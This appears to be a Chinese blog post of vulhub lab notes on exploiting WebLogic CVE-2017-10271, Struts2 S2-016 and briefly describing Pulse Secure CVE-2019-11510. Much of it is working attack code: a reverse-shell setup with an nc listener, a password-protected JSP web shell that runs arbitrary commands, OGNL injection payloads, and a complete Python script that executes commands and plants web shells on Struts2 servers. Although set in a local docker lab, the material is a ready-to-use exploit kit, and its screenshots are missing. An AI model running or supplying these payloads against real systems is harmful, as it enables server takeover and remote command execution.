vulhub环境搭建

# Download the latest version of the vulhub 
git clone https://github.com/vulhub/vulhub.git  

# Entry vulnerability directory 
cd /path/to/vuln/ 

# Compile (optional) 
docker-compose build 

# Run 
docker-compose up -d 

weblogic-CVE-2017-10271

原理

操作步骤

1、cd .../vulhub/weblogic/CVE-2017-10271
2、docker-compose up -d
3、cat README.md

方法一

clipboard.png
监听图中圈出来的地址(此地址为网关地址-尾号为1)

这里实验使用docker虚拟终端中的ip地址网关,利用命令docker exec -it [docker-name] bash进入容器镜像执行ifconfig

clipboard.png
找到ip172.18.0.2,把尾数改为1放入数据包中:

clipboard.png
先不要点击‘Go’,利用命令nc -l -p 21监听21端口

clipboard.png

然后点击Go,终端就会反弹一个shell,如下:

clipboard.png

方法二

README里面提供了一个写入jspshell的方法:

clipboard.png
这里把圈起来的内容改为jsp一句话后门:

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
#有带回显密码的

在burpsuite上直接发包:

clipboard.png

然后直接在网页上访问http://localhost:7001/bea_wls_internal/test1.jsp?pwd=023&i=ls

clipboard.png

struts2/s2-016

不解释脚本,两种方法,一种直接写入jspshell,一种写入一个界面(此界面提供一个写jsp木马的平台)

#-*- coding:utf8 -*-
import getopt,sys,requests,re

#有回显带密码验证的Jsp木马后门
JspShell1="""
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
"""

url = "http://127.0.0.1:8080/index.action"
path_payload = 'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'

#写文件的jsp页面
JspShell = """
<%@ page language="java" %><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/>
<html>
<%
int i=0;
String method=request.getParameter("act");
if(method!=null&&method.equals("up")){
String url=request.getParameter("url");
String text=request.getParameter("text");
File f=new File(url);
if(f.exists()){
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
}catch(Exception e){
i++;
%>
Failed!!
<%
}
}
if(i==0){
%>
Success~!!
<%
}
%>
<body>
<form action='?act=up' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url"><br>
<textarea rows="20" cols="80" name="text"></textarea><br>
<input type="submit" value="up" name="text"/>
</form>
</body>
</html>
"""

def info():
    print('-p webpath')
    print('-d Command')
    print('-w write jspshell')

def CommandExec(url,Command):
    InputCommand = ""
    for x in Command.split(' '):
        InputCommand += '\'%s\',' % x  #将Command中空格转换成逗号
    Payload = 'redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'
    Payload += InputCommand.rstrip(',')  #删除字符串末尾的,
    Payload +='}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'
    Result = Requests(url,Payload)
    if Result.find('<html') == -1: #命令成功
        print('执行命令成功:\n'+Result)
    else:
        print('Fail...')

def Getwebpath():
    webpath = Requests(url, path_payload)
    webpath = "".join(webpath.split())
    webpath = webpath[:-1]
    return(webpath)

def Write_JspShell(url,SavePath):
    WebShellPath = "'"+Getwebpath()+"/test.jsp'"
    #print (WebShellPath)
    Payload = "?redirect:${%23path%3d"
    Payload += WebShellPath
    Payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
    Payload += '"'+Getwebpath()+'/test.jsp Get Shell!!!"'  #返回值
    Payload += '),%23stm.getWriter().flush(),%23stm.getWriter().close()}'

    url += Payload
    #print(url)
    try:
        r = requests.post(url, data=JspShell , timeout = 10)#上传jspshell
        if r.text.find('<html') == -1:#写入成功
            return r.text
        else:#写入失敗
            return 'Fail.....>_<'
    except Exception as e:
        return str(e)


def Requests(url, Data):
    try:
        #print(url+'?'+Data)
        response = requests.get(url+'?'+Data)
        #response = urllib2.urlopen(url, Data,timeout=10)
    except Exception as e:
        return str(e)
    #过滤异常字符
    Result = response.text
    return Result 
    #Result = re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]').sub('', response.read())



if __name__ == '__main__' :
    try:
        opts, args = getopt.getopt(sys.argv[1:],"d:wp")
    except:
        info()
        sys.exit(2)
    for opt, value in opts:
        if opt == '-d':
            CommandExec(url,value)
        elif opt == '-w':
            print(Write_JspShell(url,value))
        elif opt == '-p':
            print('webpath:'+Getwebpath())

clipboard.png

clipboard.png

CVE-2019-11510

漏洞介绍

Pulse Secure Pulse Connect Secure 授权问题漏洞
Pulse Secure Pulse Connect Secure(又名PCS,前称Juniper Junos Pulse)是美国Pulse Secure公司的一套SSL VPN解决方案。

Pulse Secure PCS 9.0RX版本、8.3RX版本和8.2RX版本中存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。

危害影响

成功利用上述漏洞会造成读取任意文件

修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://kb.pulsesecure.net/ar...


秋名山车神
40 声望2 粉丝

引用和评论

0 条评论